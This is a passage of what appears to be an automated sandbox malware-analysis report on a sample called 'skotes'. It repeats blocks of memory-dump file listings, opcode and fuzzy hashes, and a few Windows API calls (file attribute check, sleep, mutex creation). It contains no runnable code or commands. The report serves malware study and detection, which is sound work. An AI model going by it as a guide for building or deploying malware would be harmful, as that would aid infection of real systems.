                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: a6a4e7908cff3d0413de81dc806cca542e628b16fe97730ad58e8cc25021dd28
                                                                                                                                                                                                                                                                • Instruction ID: 73465aa67ff6836ebf57fd9e72bde687523259206ca6bbaf1e273f110154c2aa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6a4e7908cff3d0413de81dc806cca542e628b16fe97730ad58e8cc25021dd28
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 173157317142009BEB18DB78CD89BAEB7F6EFA6314F24821DE014973D5D7369980C762
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AAA1B1
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: 214a5e4ba1271d2be58780279a539fc0cabb558e42d387af74130b69b8306596
                                                                                                                                                                                                                                                                • Instruction ID: 01ab9cb37863e2d6ec66088f20245d6129bd18a6cf15ec86ca8e51324bba1f93
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 214a5e4ba1271d2be58780279a539fc0cabb558e42d387af74130b69b8306596
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 873157317042009BFB18DBB8DD89BAEB7B6EFA7310F244219E014973D5D73A9980C762
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AAA2E6
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: 6cae3a0c922e21111c2ebe984fb64e2262483ac96612ee0538018ee0bfbefb58
                                                                                                                                                                                                                                                                • Instruction ID: 5fe118ca32eb2b95896b26898e0d27c9ea9735bec9cda9fe532bbb98847f0122
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cae3a0c922e21111c2ebe984fb64e2262483ac96612ee0538018ee0bfbefb58
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 713177317042009BEF18DB78DD887AEB7B6EFA3314F208218E0159B3D5D7769980C762
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AAA41B
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 396266464-0
                                                                                                                                                                                                                                                                • Opcode ID: fac0b21fbe7e605cda7b633c3f2c7b4bf0825e4c2e6815153a25b795bc1a7e09
                                                                                                                                                                                                                                                                • Instruction ID: 71564d7b198db7794cd761d3c5787be2f0d47c28f28dccbab03ca3058ece9b33
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fac0b21fbe7e605cda7b633c3f2c7b4bf0825e4c2e6815153a25b795bc1a7e09
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E317B317142009BEB0CABB8DDC9BAEB7B6EFA6314F204219F024973D5D7759980C762
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00AAA550
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,?), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
